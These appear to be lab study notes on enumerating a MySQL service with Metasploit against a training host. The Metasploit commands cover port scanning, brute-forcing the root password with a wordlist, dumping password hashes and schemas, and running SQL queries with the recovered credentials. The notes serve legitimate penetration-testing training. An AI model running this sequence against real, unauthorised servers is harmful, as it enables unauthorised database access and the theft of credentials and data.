- MySQL is an open source relational database management system based on SQL (Structured Query Language).
- It is typically used to store records, customer data, and is most commonly deployed to store web application data.
- MySQL utilizes port 3306/tcp by default, however, like any service it can be hosted on any open TCP port. Hosting MySQL on non-common ports is a common practice for organizations.
- We can utilize auxiliary modules to enumerate the version of MySQL, perform brute-force attacks to identify passwords, execute SQL queries and much more.

Practical Demonstration
	- `ifconfig`
	- `service postgresql start`
	- `msfconsole`
	- `workspace -a mysql_enum`
	- `setg RHOSTS demo.ine.local`
	- `setg RHOST demo.ine.local`
	- Port scanning
		- `search portscan`
		- `use auxiliary/scanner/portscan/tcp`
		- `options`
		- `run`
	- MySQL Version Detection (and OS Detection)
		- `search type:auxiliary name:mysql`
		- `use auxiliary/scanner/mysql/mysql_version`
		- `options`
		- `set RPORT 3306`
		- `run`
	- For further enumeration, we need some form of access to the MySQL database, which we can obtain using either an exploit for the MySQL service, or by performing a bruteforce attack.
	- For bruteforce attacks, it is generally a good idea to perform them on the root user first.
		- `search mysql_login`
		- `use auxiliary/scanner/mysql/mysql_login`
		- `options`
		- `set USER root`
		- `set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt`
		- `set VERBOSE false`
		- `run`
	- MySQL Enumeration using `mysql_enum`
		- (auxiliary/admin modules need user credentials to be used)
		- `search mysql_enum`
		- `use /auxiliary/admin/mysql/mysql_enum`
		- `info`
		- `options`
		- `set PASSWORD twinkle`
		- `set USERNAME root`
		- This module will also enumerate the password hashes for the MySQL database's user accounts, these hashes would need to be cracked to find out clear-text passwords.
		- This module also enumerates user and privilege information.
	- Execute SQL queries on the database using MySQL SQL module
		- `use auxiliary/admin/mysql/mysql_sql`
		- `set USERNAME root`
		- `set PASSWORD twinkle`
		- `set SQL select version()`
		- `set SQL show databases;`
		- `run`
		- `set SQL use videos;`
		- `set SQL show tables;`
	- MySQL Schema Enumeration using `mysql_schemadump`
		- `search mysql_schema`
		- `use auxiliary/scanner/mysql/mysql_schemadump`
		- `options`
		- `set USERNAME root`
		- `set PASSWORD twinkle`
		- The `loot` command in Metasploit lists the dumps we came across during the pen-testing process.
		- `loot`
		- The `creds` command in Metasploit lists all the credentials we came across during the pen-testing process.
		- `creds`
	- Connecting to the MySQL database using the `mysql` client.
		- `mysql -h demo.ine.local -u root -p`